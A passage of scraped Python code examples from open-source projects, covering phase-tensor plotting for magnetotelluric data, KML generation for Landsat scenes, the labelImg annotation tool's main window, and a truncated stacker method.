View license
    def plotAll(self,xspacing=6,esize=5,save='n',fmt='pdf',
                fignum=1,thetar=0):
        """plotAll will plot phase tensor, strike angle, min and max phase angle, 
        azimuth, skew, and ellipticity as subplots on one plot.  Save='y' if you 
        want to save the figure with path similar to input file or Save=savepath
        if you want to define the path yourself.  fmt can be pdf,eps,ps,png,
        svg. Fignum is the number of the figure."""
        
        stationstr=self.z[0].station
        stationlst=[]
        #Set plot parameters
        plt.rcParams['font.size']=8
        plt.rcParams['figure.subplot.left']=.07
        plt.rcParams['figure.subplot.right']=.98
        plt.rcParams['figure.subplot.bottom']=.08
        plt.rcParams['figure.subplot.top']=.95
        plt.rcParams['figure.subplot.wspace']=.2
        plt.rcParams['figure.subplot.hspace']=.4
        
        fs=8
        tfs=10
        #begin plotting
        fig=plt.figure(fignum,[8,10],dpi=150)
        for dd in range(len(self.z)):
            #get phase tensor infmtion
            pt=self.z[dd].getPhaseTensor(thetar=thetar)
            zinv=self.z[dd].getInvariants(thetar=thetar)
            tip=self.z[dd].getTipper(thetar=thetar)
            period=self.z[dd].period
            n=len(period)
            stationlst.append(self.z[dd].station)
            if dd!=0:
                stationstr+=','+self.z[dd].station
            else:
                pass

            
            #plotPhaseTensor
            ax1=plt.subplot(3,1,1,aspect='equal')
            for ii in range(n):
                #make sure the ellipses will be visable
                scaling=esize/pt.phimax[ii]
                eheight=pt.phimin[ii]*scaling
                ewidth=pt.phimax[ii]*scaling
                    
                #create an ellipse scaled by phimin and phimax and oriented along
                #the azimuth    
                ellip=Ellipse((xspacing*ii,0),width=ewidth,
                              height=eheight,
                              angle=pt.azimuth[ii])
                ax1.add_artist(ellip)
                
                if pt.phimin[ii]<0 or pt.phimin[ii]=='nan':
                    cvars=0
#                    print 'less than 0 or nan',cvars
                else:
                    cvars=(pt.phimin[ii]/(np.pi/2))
#                    print 'calculated ',cvars
                    if cvars>1.0:
                        cvars=0
#                        print 'greater than 1 ',cvars
#                print cvars
                    
                ellip.set_facecolor((1,1-cvars,.1))
            
            xticklabels=['%2.2g' % period[ii] for ii in np.arange(start=0,stop=n,
                         step=3)]
            plt.xlabel('Period (s)',fontsize=8,fontweight='bold')
            #plt.title('Phase Tensor Ellipses for '+stationstr,fontsize=14)
            plt.xticks(np.arange(start=0,stop=xspacing*n,step=3*xspacing),
                       xticklabels)
            ax1.set_ylim(-1*(xspacing+3),xspacing+3)
            ax1.set_xlim(-xspacing,n*xspacing+3)
            plt.grid()
            if dd==0:
                ax1cb=make_axes(ax1,shrink=.3,orientation='horizontal',pad=.30)
                cb=ColorbarBase(ax1cb[0],cmap=ptcmap,
                                norm=Normalize(vmin=min(pt.phiminang),
                                               vmax=max(pt.phiminang)),
                                orientation='horizontal')
                cb.set_label('Min Phase')
        
            if len(stationlst)>1:
                plt.legend(stationlst,loc=0,markerscale=.4,borderaxespad=.05,
                       labelspacing=.1,handletextpad=.2)
                leg=plt.gca().get_legend()
                ltext=leg.get_texts()  # all the text.Text instance in the legend
                plt.setp(ltext, fontsize=10)    # the legend text fontsize
        
            
            #plotStrikeAngle
            
            az=90-np.array(pt.azimuth)
            azvar=np.array(pt.azimuthvar)
            realarrow=tip.magreal
            realarrowvar=np.zeros(len(realarrow))+.00000001
            
            ax2=plt.subplot(3,2,3)
            erxy=plt.errorbar(period,zinv.strike,
                              marker=self.pcmlst[dd][0],ms=4,mfc='None',
                              mec=self.pcmlst[dd][1],mew=1,ls='None',
                              yerr=zinv.strikeerr,
                              ecolor=self.pcmlst[dd][1])
            eraz=plt.errorbar(period,az,marker=self.pcmlst[dd+1][0],ms=4,
                              mfc='None',mec=self.pcmlst[dd+1][1],mew=1,
                              ls='None',yerr=azvar,ecolor=self.pcmlst[dd+1][1])
            #ertip=plt.errorbar(period,realarrow,marker='>',ms=4,mfc='None',mec='k',
            #                   mew=1,ls='None',yerr=realarrowvar,ecolor='k')
            plt.legend((erxy[0],eraz[0]),('Strike','Azimuth'),loc=0,
                       markerscale=.2,borderaxespad=.01,labelspacing=.1,
                       handletextpad=.2)
            leg = plt.gca().get_legend()
            ltext  = leg.get_texts()  # all the text.Text instance in the legend
            plt.setp(ltext, fontsize=6)    # the legend text fontsize
    
            
            ax2.set_yscale('linear')
            ax2.set_xscale('log')
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=-200,ymax=200)
            plt.grid(True)
            #plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Angle (deg)',fontsize=fs,fontweight='bold')
            plt.title('Strike Angle, Azimuth',fontsize=tfs,
                      fontweight='bold')
            
            #plotMinMaxPhase
            
            minphi=pt.phiminang
            minphivar=pt.phiminangvar
            maxphi=pt.phimaxang
            maxphivar=pt.phimaxangvar
    
            ax3=plt.subplot(3,2,4,sharex=ax2)
            ermin=plt.errorbar(period,minphi,marker=self.pcmlst[dd][0],ms=4,
                               mfc='None',mec=self.pcmlst[dd][1],mew=1,ls='None',
                               yerr=minphivar,ecolor=self.pcmlst[dd][1])
            ermax=plt.errorbar(period,maxphi,marker=self.pcmlst[dd+1][0],ms=4,
                               mfc='None',mec=self.pcmlst[dd+1][1],mew=1,
                               ls='None',yerr=maxphivar,
                               ecolor=self.pcmlst[dd+1][1])
            ax3.set_xscale('log')
            ax3.set_yscale('linear')
            plt.legend((ermin[0],ermax[0]),('$\phi_{min}$','$\phi_{max}$'),
                       loc='upper left',markerscale=.2,borderaxespad=.01,
                       labelspacing=.1,handletextpad=.2)
            leg = plt.gca().get_legend()
            ltext  = leg.get_texts()  # all the text.Text instance in the legend
            plt.setp(ltext, fontsize=6.5)    # the legend text fontsize
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=0,ymax=90)
            plt.grid(True)
            #plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Phase (deg)',fontsize=fs,fontweight='bold')
            plt.title('$\mathbf{\phi_{min}}$ and $\mathbf{\phi_{max}}$',fontsize=tfs,
                      fontweight='bold')

            
            #plotSkew
            
            skew=pt.beta
            skewvar=pt.betavar
    
            ax5=plt.subplot(3,2,5,sharex=ax2)
            erskew=plt.errorbar(period,skew,marker=self.pcmlst[dd][0],ms=4,
                                mfc='None',mec=self.pcmlst[dd][1],mew=1,
                                ls='None',yerr=skewvar,
                                ecolor=self.pcmlst[dd][1])
            ax5.set_xscale('log')
            ax5.set_yscale('linear')
            ax5.yaxis.set_major_locator(MultipleLocator(10))
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),xmin=10**(
                                np.floor(np.log10(period[0]))))
            plt.ylim(ymin=-45,ymax=45)
            plt.grid(True)
            plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('Skew Angle (deg)',fontsize=fs,fontweight='bold')
            plt.title('Skew Angle',fontsize=tfs,fontweight='bold')
            
            #plotEllipticity
            
            ellipticity=pt.ellipticity
            ellipticityvar=pt.ellipticityvar
    
            ax6=plt.subplot(3,2,6,sharex=ax2)
            erskew=plt.errorbar(period,ellipticity,marker=self.pcmlst[dd][0],
                                ms=4,mfc='None',mec=self.pcmlst[dd][1],mew=1,
                                ls='None',yerr=ellipticityvar,
                                ecolor=self.pcmlst[dd][1])
            ax6.set_xscale('log')
            ax6.set_yscale('linear')
            ax6.yaxis.set_major_locator(MultipleLocator(.1))
            plt.xlim(xmax=10**(np.ceil(np.log10(period[-1]))),
                     xmin=10**(np.floor(np.log10(period[0]))))
            plt.ylim(ymin=0,ymax=1)
            #plt.yticks(range(10),np.arange(start=0,stop=1,step=.1))
            plt.grid(True)
            plt.xlabel('Period (s)',fontsize=fs,fontweight='bold')
            plt.ylabel('$\mathbf{\phi_{max}-\phi_{min}/\phi_{max}+\phi_{min}}$',
                       fontsize=fs,fontweight='bold')
            plt.title('Ellipticity',fontsize=tfs,fontweight='bold')
            #plt.suptitle(self.z.station,fontsize=tfs,fontweight='bold')
        plt.suptitle('Phase Tensor Elements for: '+stationstr,fontsize=12,
                     fontweight='bold')
            
        if save=='y':
            if not os.path.exists(self.savepath):
                os.mkdir(self.savepath)
                print 'Made Directory: '+ self.savepath
            fig.savefig(os.path.join(self.savepath,
                                     self.z[0].station+'All.'+fmt),
                        fmt=fmt)
            print 'Saved figure to: '+os.path.join(self.savepath,
                                               self.z[0].station+'All.'+fmt)
            plt.close()
        elif len(save)>1:
            fig.savefig(os.path.join(save,self.z[0].station+'All.'+fmt),
                        fmt=fmt)
            print 'Saved figure to: '+os.path.join(save,
                                               self.z[0].station+'All.'+fmt)
            plt.close()
        elif save=='n':
            pass

Example 116

Project: agdc
Source File: scene_kml_generator.py
View license
    def generate(self, kml_filename=None, wrs_shapefile='WRS-2_bound_world.kml'):
        '''
        Generate a KML file
        '''
        def write_xml_file(filename, dom_tree, save_backup=False):
            """Function write the metadata contained in self._metadata_dict to an XML file
            Argument:
                filename: Metadata file to be written
                uses_attributes: Boolean flag indicating whether to write values to tag attributes
            """
            logger.debug('write_file(%s) called', filename)
    
            if save_backup and os.path.exists(filename + '.bck'):
                os.remove(filename + '.bck')
    
            if os.path.exists(filename):
                if save_backup:
                    os.rename(filename, filename + '.bck')
                else:
                    os.remove(filename)
    
            # Open XML document
            try:
                outfile = open(filename, 'w')
                assert outfile is not None, 'Unable to open XML file ' + filename + ' for writing'
    
                logger.debug('Writing XML file %s', filename)
    
                # Strip all tabs and EOLs from around values, remove all empty lines
                outfile.write(re.sub('\>(\s+)(\n\t*)\<',
                                     '>\\2<',
                                     re.sub('(\<\w*[^/]\>)\n(\t*\n)*(\t*)([^<>\n]*)\n\t*\n*(\t+)(\</\w+\>)',
                                            '\\1\\4\\6',
                                            dom_tree.toprettyxml(encoding='utf-8')
                                            )
                                     )
                              )
    
            finally:
                outfile.close()
    
        def get_wrs_placemark_node(wrs_document_node, placemark_name):
            """
            Return a clone of the WRS placemark node with the specified name
            """ 
            try:
                return [placemark_node for placemark_node in self.getChildNodesByName(wrs_document_node, 'Placemark') 
                    if self.getChildNodesByName(placemark_node, 'name')[0].childNodes[0].nodeValue == placemark_name][0].cloneNode(True)
            except:
                return None
                

        
        def create_placemark_node(wrs_document_node, acquisition_info):
            """
            Create a new placemark node for the specified acquisition
            """
            logger.info('Processing %s', acquisition_info['dataset_name'])
            
            wrs_placemark_name = '%d_%d' % (acquisition_info['path'], acquisition_info['row'])
            
            kml_placemark_name = acquisition_info['dataset_name']
            
            placemark_node = get_wrs_placemark_node(wrs_document_node, wrs_placemark_name)
            
            self.getChildNodesByName(placemark_node, 'name')[0].childNodes[0].nodeValue = kml_placemark_name
            
            kml_time_span_node = kml_dom_tree.createElement('TimeSpan')
            placemark_node.appendChild(kml_time_span_node)
            
            kml_time_begin_node = kml_dom_tree.createElement('begin')
            kml_time_begin_text_node = kml_dom_tree.createTextNode(acquisition_info['start_datetime'].isoformat())
            kml_time_begin_node.appendChild(kml_time_begin_text_node)
            kml_time_span_node.appendChild(kml_time_begin_node)
            
            kml_time_end_node = kml_dom_tree.createElement('end')
            kml_time_end_text_node = kml_dom_tree.createTextNode(acquisition_info['end_datetime'].isoformat())
            kml_time_end_node.appendChild(kml_time_end_text_node)
            kml_time_span_node.appendChild(kml_time_end_node)
            
            description_node = self.getChildNodesByName(placemark_node, 'description')[0]
            description_node.childNodes[0].data = '''<strong>Geoscience Australia ARG25 Dataset</strong> 
<table cellspacing="1" cellpadding="1">
    <tr>
        <td>Satellite:</td>
        <td>%(satellite)s</td>
    </tr>
    <tr>
        <td>Sensor:</td>
        <td>%(sensor)s</td>
    </tr>
    <tr>
        <td>Start date/time (UTC):</td>
        <td>%(start_datetime)s</td>
    </tr>
    <tr>
        <td>End date/time (UTC):</td>
        <td>%(end_datetime)s</td>
    </tr>
    <tr>
        <td>WRS Path-Row:</td>
        <td>%(path)03d-%(row)03d</td>
    </tr>
    <tr>
        <td>Bounding Box (LL,UR):</td>
        <td>(%(ll_lon)f,%(lr_lat)f),(%(ur_lon)f,%(ul_lat)f)</td>
    </tr>
    <tr>
        <td>Est. Cloud Cover (USGS):</td>
        <td>%(cloud_cover)s%%</td>
    </tr>
    <tr>
        <td>GCP Count:</td>
        <td>%(gcp_count)s</td>
    </tr>
    <tr>
        <td>
            <a href="http://eos.ga.gov.au/thredds/wms/LANDSAT/%(year)04d/%(month)02d/%(dataset_name)s_BX.nc?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0&LAYERS=FalseColour741&STYLES=&FORMAT=image/png&TRANSPARENT=TRUE&CRS=CRS:84&BBOX=%(ll_lon)f,%(lr_lat)f,%(ur_lon)f,%(ul_lat)f&WIDTH=%(thumbnail_size)d&HEIGHT=%(thumbnail_size)d">View thumbnail</a>
        </td>
        <td>
            <a href="http://eos.ga.gov.au/thredds/fileServer/LANDSAT/%(year)04d/%(month)02d/%(dataset_name)s_BX.nc">Download full NetCDF file</a>
        </td>
    </tr>
</table>''' % acquisition_info
            
            return placemark_node
            
            
        kml_filename = kml_filename or self.output_file
        assert kml_filename, 'Output filename must be specified'
        
        wrs_dom_tree = xml.dom.minidom.parse(wrs_shapefile)
        wrs_document_element = wrs_dom_tree.documentElement
        wrs_document_node = self.getChildNodesByName(wrs_document_element, 'Document')[0]
        
        kml_dom_tree = xml.dom.minidom.getDOMImplementation().createDocument(wrs_document_element.namespaceURI, 
                                                                             'kml', 
                                                                             wrs_dom_tree.doctype)
        kml_document_element = kml_dom_tree.documentElement
        
        # Copy document attributes
        for attribute_value in wrs_document_element.attributes.items():
            kml_document_element.setAttribute(attribute_value[0], attribute_value[1])
            
        kml_document_node = kml_dom_tree.createElement('Document')
        kml_document_element.appendChild(kml_document_node)
        
        
        # Copy all child nodes of the "Document" node except placemarks
        for wrs_child_node in [child_node for child_node in wrs_document_node.childNodes 
                               if child_node.nodeName != 'Placemark']:
                                   
            kml_child_node = kml_dom_tree.importNode(wrs_child_node, True)                                   
            kml_document_node.appendChild(kml_child_node)
            
        # Update document name 
        doc_name = 'Geoscience Australia ARG-25 Landsat Scenes'
        if self.satellite or self.sensor:
            doc_name += ' for'
            if self.satellite:
                doc_name += ' %s' % self.satellite
            if self.sensor:
                doc_name += ' %s' % self.sensor
        if self.start_date:
            doc_name += ' from %s' % self.start_date
        if self.end_date:
            doc_name += ' to %s' % self.end_date
            
        logger.debug('Setting document name to "%s"', doc_name)
        self.getChildNodesByName(kml_document_node, 'name')[0].childNodes[0].data = doc_name
         
        # Update style nodes as specified in self.style_dict
        for style_node in self.getChildNodesByName(kml_document_node, 'Style'):
            logger.debug('Style node found')
            for tag_name in self.style_dict.keys():
                tag_nodes = self.getChildNodesByName(style_node, tag_name)
                if tag_nodes:
                    logger.debug('\tExisting tag node found for %s', tag_name)
                    tag_node = tag_nodes[0]
                else:
                    logger.debug('\tCreating new tag node for %s', tag_name)
                    tag_node = kml_dom_tree.createElement(tag_name)
                    style_node.appendChild(tag_node)
                    
                for attribute_name in self.style_dict[tag_name].keys():
                    attribute_nodes = self.getChildNodesByName(tag_node, attribute_name)
                    if attribute_nodes:
                        logger.debug('\t\tExisting attribute node found for %s', attribute_name)
                        attribute_node = attribute_nodes[0]
                        text_node = attribute_node.childNodes[0]
                        text_node.data = str(self.style_dict[tag_name][attribute_name])
                    else:
                        logger.debug('\t\tCreating new attribute node for %s', attribute_name)
                        attribute_node = kml_dom_tree.createElement(attribute_name)
                        tag_node.appendChild(attribute_node)
                        text_node = kml_dom_tree.createTextNode(str(self.style_dict[tag_name][attribute_name]))
                        attribute_node.appendChild(text_node)
    
           
        self.db_cursor = self.db_connection.cursor()
        
        sql = """-- Find all NBAR acquisitions
select satellite_name as satellite, sensor_name as sensor, 
x_ref as path, y_ref as row, 
start_datetime, end_datetime,
dataset_path,
ll_lon, ll_lat,
lr_lon, lr_lat,
ul_lon, ul_lat,
ur_lon, ur_lat,
cloud_cover::integer, gcp_count::integer
from 
    (
    select *
    from dataset
    where level_id = 2 -- NBAR
    ) dataset
inner join acquisition a using(acquisition_id)
inner join satellite using(satellite_id)
inner join sensor using(satellite_id, sensor_id)

where (%(start_date)s is null or end_datetime::date >= %(start_date)s)
  and (%(end_date)s is null or end_datetime::date <= %(end_date)s)
  and (%(satellite)s is null or satellite_tag = %(satellite)s)
  and (%(sensor)s is null or sensor_name = %(sensor)s)

order by end_datetime
;
"""
        params = {
                  'start_date': self.start_date,
                  'end_date': self.end_date,
                  'satellite': self.satellite,
                  'sensor': self.sensor
                  }
        
        log_multiline(logger.debug, self.db_cursor.mogrify(sql, params), 'SQL', '\t')
        self.db_cursor.execute(sql, params)
        
        field_list = ['satellite',
                      'sensor', 
                      'path',
                      'row', 
                      'start_datetime', 
                      'end_datetime',
                      'dataset_path',
                      'll_lon',
                      'll_lat',
                      'lr_lon',
                      'lr_lat',
                      'ul_lon',
                      'ul_lat',
                      'ur_lon',
                      'ur_lat',
                      'cloud_cover', 
                      'gcp_count'
                      ]
        
        for record in self.db_cursor:
            
            acquisition_info = {}
            for field_index in range(len(field_list)):
                acquisition_info[field_list[field_index]] = record[field_index]
                
            acquisition_info['year'] = acquisition_info['end_datetime'].year    
            acquisition_info['month'] = acquisition_info['end_datetime'].month    
            acquisition_info['thumbnail_size'] = self.thumbnail_size   
            acquisition_info['dataset_name'] = re.search('[^/]+$', acquisition_info['dataset_path']).group(0)
            
            log_multiline(logger.debug, acquisition_info, 'acquisition_info', '\t')
                
            placemark_node = create_placemark_node(wrs_document_node, acquisition_info)
            kml_document_node.appendChild(placemark_node)
            
        logger.info('Writing KML to %s', kml_filename)
        write_xml_file(kml_filename, kml_dom_tree)

Example 117

Project: labelImg
Source File: labelImg.py
View license
    def __init__(self, filename=None):
        super(MainWindow, self).__init__()
        self.setWindowTitle(__appname__)
        # Save as Pascal voc xml
        self.defaultSaveDir = None
        self.usingPascalVocFormat = True
        if self.usingPascalVocFormat:
            LabelFile.suffix = '.xml'
        # For loading all image under a directory
        self.mImgList = []
        self.dirname = None
        self.labelHist = []
        self.lastOpenDir = None

        # Whether we need to save or not.
        self.dirty = False

        # Enble auto saving if pressing next
        self.autoSaving = True
        self._noSelectionSlot = False
        self._beginner = True
        self.screencastViewer = "firefox"
        self.screencast = "https://youtu.be/p0nR2YsCY_U"

        self.loadPredefinedClasses()
        # Main widgets and related state.
        self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
        self.labelList = QListWidget()
        self.itemsToShapes = {}
        self.shapesToItems = {}

        self.labelList.itemActivated.connect(self.labelSelectionChanged)
        self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
        self.labelList.itemDoubleClicked.connect(self.editLabel)
        # Connect to itemChanged to detect checkbox changes.
        self.labelList.itemChanged.connect(self.labelItemChanged)

        listLayout = QVBoxLayout()
        listLayout.setContentsMargins(0, 0, 0, 0)
        listLayout.addWidget(self.labelList)
        self.editButton = QToolButton()
        self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.labelListContainer = QWidget()
        self.labelListContainer.setLayout(listLayout)
        listLayout.addWidget(self.editButton)#, 0, Qt.AlignCenter)
        listLayout.addWidget(self.labelList)


        self.dock = QDockWidget(u'Box Labels', self)
        self.dock.setObjectName(u'Labels')
        self.dock.setWidget(self.labelListContainer)

        # Tzutalin 20160906 : Add file list and dock to move faster
        self.fileListWidget = QListWidget()
        self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
        filelistLayout = QVBoxLayout()
        filelistLayout.setContentsMargins(0, 0, 0, 0)
        filelistLayout.addWidget(self.fileListWidget)
        self.fileListContainer = QWidget()
        self.fileListContainer.setLayout(filelistLayout)
        self.filedock = QDockWidget(u'File List', self)
        self.filedock.setObjectName(u'Files')
        self.filedock.setWidget(self.fileListContainer)

        self.zoomWidget = ZoomWidget()
        self.colorDialog = ColorDialog(parent=self)

        self.canvas = Canvas()
        self.canvas.zoomRequest.connect(self.zoomRequest)

        scroll = QScrollArea()
        scroll.setWidget(self.canvas)
        scroll.setWidgetResizable(True)
        self.scrollBars = {
            Qt.Vertical: scroll.verticalScrollBar(),
            Qt.Horizontal: scroll.horizontalScrollBar()
            }
        self.canvas.scrollRequest.connect(self.scrollRequest)

        self.canvas.newShape.connect(self.newShape)
        self.canvas.shapeMoved.connect(self.setDirty)
        self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
        self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)

        self.setCentralWidget(scroll)
        self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
        # Tzutalin 20160906 : Add file list and dock to move faster
        self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
        self.dockFeatures = QDockWidget.DockWidgetClosable\
                          | QDockWidget.DockWidgetFloatable
        self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)

        # Actions
        action = partial(newAction, self)
        quit = action('&Quit', self.close,
                'Ctrl+Q', 'quit', u'Quit application')
        open = action('&Open', self.openFile,
                'Ctrl+O', 'open', u'Open image or label file')

        opendir = action('&Open Dir', self.openDir,
                'Ctrl+u', 'open', u'Open Dir')

        changeSavedir = action('&Change default saved Annotation dir', self.changeSavedir,
                'Ctrl+r', 'open', u'Change default saved Annotation dir')

        openAnnotation = action('&Open Annotation', self.openAnnotation,
                'Ctrl+q', 'openAnnotation', u'Open Annotation')

        openNextImg = action('&Next Image', self.openNextImg,
                'n', 'next', u'Open Next')

        openPrevImg = action('&Prev Image', self.openPrevImg,
                'p', 'prev', u'Open Prev')

        save = action('&Save', self.saveFile,
                'Ctrl+S', 'save', u'Save labels to file', enabled=False)
        saveAs = action('&Save As', self.saveFileAs,
                'Ctrl+Shift+S', 'save-as', u'Save labels to a different file',
                enabled=False)
        close = action('&Close', self.closeFile,
                'Ctrl+W', 'close', u'Close current file')
        color1 = action('Box &Line Color', self.chooseColor1,
                'Ctrl+L', 'color_line', u'Choose Box line color')
        color2 = action('Box &Fill Color', self.chooseColor2,
                'Ctrl+Shift+L', 'color', u'Choose Box fill color')

        createMode = action('Create\nRectBox', self.setCreateMode,
                'Ctrl+N', 'new', u'Start drawing Boxs', enabled=False)
        editMode = action('&Edit\nRectBox', self.setEditMode,
                'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)

        create = action('Create\nRectBox', self.createShape,
                'Ctrl+N', 'new', u'Draw a new Box', enabled=False)
        delete = action('Delete\nRectBox', self.deleteSelectedShape,
                'Delete', 'delete', u'Delete', enabled=False)
        copy = action('&Duplicate\nRectBox', self.copySelectedShape,
                'Ctrl+D', 'copy', u'Create a duplicate of the selected Box',
                enabled=False)

        advancedMode = action('&Advanced Mode', self.toggleAdvancedMode,
                'Ctrl+Shift+A', 'expert', u'Switch to advanced mode',
                checkable=True)

        hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
                'Ctrl+H', 'hide', u'Hide all Boxs',
                enabled=False)
        showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
                'Ctrl+A', 'hide', u'Show all Boxs',
                enabled=False)

        help = action('&Tutorial', self.tutorial, 'Ctrl+T', 'help',
                u'Show demos')

        zoom = QWidgetAction(self)
        zoom.setDefaultWidget(self.zoomWidget)
        self.zoomWidget.setWhatsThis(
            u"Zoom in or out of the image. Also accessible with"\
             " %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
                 fmtShortcut("Ctrl+Wheel")))
        self.zoomWidget.setEnabled(False)

        zoomIn = action('Zoom &In', partial(self.addZoom, 10),
                'Ctrl++', 'zoom-in', u'Increase zoom level', enabled=False)
        zoomOut = action('&Zoom Out', partial(self.addZoom, -10),
                'Ctrl+-', 'zoom-out', u'Decrease zoom level', enabled=False)
        zoomOrg = action('&Original size', partial(self.setZoom, 100),
                'Ctrl+=', 'zoom', u'Zoom to original size', enabled=False)
        fitWindow = action('&Fit Window', self.setFitWindow,
                'Ctrl+F', 'fit-window', u'Zoom follows window size',
                checkable=True, enabled=False)
        fitWidth = action('Fit &Width', self.setFitWidth,
                'Ctrl+Shift+F', 'fit-width', u'Zoom follows window width',
                checkable=True, enabled=False)
        # Group zoom controls into a list for easier toggling.
        zoomActions = (self.zoomWidget, zoomIn, zoomOut, zoomOrg, fitWindow, fitWidth)
        self.zoomMode = self.MANUAL_ZOOM
        self.scalers = {
            self.FIT_WINDOW: self.scaleFitWindow,
            self.FIT_WIDTH: self.scaleFitWidth,
            # Set to one to scale to 100% when loading files.
            self.MANUAL_ZOOM: lambda: 1,
        }

        edit = action('&Edit Label', self.editLabel,
                'Ctrl+E', 'edit', u'Modify the label of the selected Box',
                enabled=False)
        self.editButton.setDefaultAction(edit)

        shapeLineColor = action('Shape &Line Color', self.chshapeLineColor,
                icon='color_line', tip=u'Change the line color for this specific shape',
                enabled=False)
        shapeFillColor = action('Shape &Fill Color', self.chshapeFillColor,
                icon='color', tip=u'Change the fill color for this specific shape',
                enabled=False)

        labels = self.dock.toggleViewAction()
        labels.setText('Show/Hide Label Panel')
        labels.setShortcut('Ctrl+Shift+L')

        # Lavel list context menu.
        labelMenu = QMenu()
        addActions(labelMenu, (edit, delete))
        self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
        self.labelList.customContextMenuRequested.connect(self.popLabelListMenu)

        # Store actions for further handling.
        self.actions = struct(save=save, saveAs=saveAs, open=open, close=close,
                lineColor=color1, fillColor=color2,
                create=create, delete=delete, edit=edit, copy=copy,
                createMode=createMode, editMode=editMode, advancedMode=advancedMode,
                shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
                zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
                fitWindow=fitWindow, fitWidth=fitWidth,
                zoomActions=zoomActions,
                fileMenuActions=(open,opendir,save,saveAs,close,quit),
                beginner=(), advanced=(),
                editMenu=(edit, copy, delete, None, color1, color2),
                beginnerContext=(create, edit, copy, delete),
                advancedContext=(createMode, editMode, edit, copy,
                    delete, shapeLineColor, shapeFillColor),
                onLoadActive=(close, create, createMode, editMode),
                onShapesPresent=(saveAs, hideAll, showAll))

        self.menus = struct(
                file=self.menu('&File'),
                edit=self.menu('&Edit'),
                view=self.menu('&View'),
                help=self.menu('&Help'),
                recentFiles=QMenu('Open &Recent'),
                labelList=labelMenu)

        addActions(self.menus.file,
                (open, opendir,changeSavedir, openAnnotation, self.menus.recentFiles, save, saveAs, close, None, quit))
        addActions(self.menus.help, (help,))
        addActions(self.menus.view, (
            labels, advancedMode, None,
            hideAll, showAll, None,
            zoomIn, zoomOut, zoomOrg, None,
            fitWindow, fitWidth))

        self.menus.file.aboutToShow.connect(self.updateFileMenu)

        # Custom context menu for the canvas widget:
        addActions(self.canvas.menus[0], self.actions.beginnerContext)
        addActions(self.canvas.menus[1], (
            action('&Copy here', self.copyShape),
            action('&Move here', self.moveShape)))

        self.tools = self.toolbar('Tools')
        self.actions.beginner = (
            open, opendir, openNextImg, openPrevImg, save, None, create, copy, delete, None,
            zoomIn, zoom, zoomOut, fitWindow, fitWidth)

        self.actions.advanced = (
            open, save, None,
            createMode, editMode, None,
            hideAll, showAll)

        self.statusBar().showMessage('%s started.' % __appname__)
        self.statusBar().show()

        # Application state.
        self.image = QImage()
        self.filename = filename
        self.recentFiles = []
        self.maxRecent = 7
        self.lineColor = None
        self.fillColor = None
        self.zoom_level = 100
        self.fit_window = False

        # XXX: Could be completely declarative.
        # Restore application settings.
        types = {
            'filename': QString,
            'recentFiles': QStringList,
            'window/size': QSize,
            'window/position': QPoint,
            'window/geometry': QByteArray,
            # Docks and toolbars:
            'window/state': QByteArray,
            'savedir': QString,
            'lastOpenDir': QString,
        }
        self.settings = settings = Settings(types)
        self.recentFiles = list(settings['recentFiles'])
        size = settings.get('window/size', QSize(600, 500))
        position = settings.get('window/position', QPoint(0, 0))
        self.resize(size)
        self.move(position)
        saveDir = settings.get('savedir', None)
        self.lastOpenDir = settings.get('lastOpenDir', None)
        if os.path.exists(unicode(saveDir)):
            self.defaultSaveDir = unicode(saveDir)
            self.statusBar().showMessage('%s started. Annotation will be saved to %s' %(__appname__, self.defaultSaveDir))
            self.statusBar().show()

        # or simply:
        #self.restoreGeometry(settings['window/geometry']
        self.restoreState(settings['window/state'])
        self.lineColor = QColor(settings.get('line/color', Shape.line_color))
        self.fillColor = QColor(settings.get('fill/color', Shape.fill_color))
        Shape.line_color = self.lineColor
        Shape.fill_color = self.fillColor

        if settings.get('advanced', QVariant()).toBool():
            self.actions.advancedMode.setChecked(True)
            self.toggleAdvancedMode()

        # Populate the File menu dynamically.
        self.updateFileMenu()
        # Since loading the file may take some time, make sure it runs in the background.
        self.queueEvent(partial(self.loadFile, self.filename))

        # Callbacks:
        self.zoomWidget.valueChanged.connect(self.paintCanvas)

        self.populateModeActions()

Example 118

Project: agdc
Source File: fc_stacker.py
View license
    def derive_datasets(self, input_dataset_dict, stack_output_info, tile_type_info):
        """ Overrides abstract function in stacker class. Called in Stacker.stack_derived() function. 
        Creates PQA-masked NDVI stack
        
        Arguments:
            fc_dataset_dict: Dict keyed by processing level (e.g. ORTHO, FC, PQA, DEM)
                containing all tile info which can be used within the function
                A sample is shown below (including superfluous band-specific information):
                
{
'FC': {'band_name': 'Visible Blue',
    'band_tag': 'B10',
    'end_datetime': datetime.datetime(2000, 2, 9, 23, 46, 36, 722217),
    'end_row': 77,
    'level_name': 'FC',
    'nodata_value': -999L,
    'path': 91,
    'satellite_tag': 'LS7',
    'sensor_name': 'ETM+',
    'start_datetime': datetime.datetime(2000, 2, 9, 23, 46, 12, 722217),
    'start_row': 77,
    'tile_layer': 1,
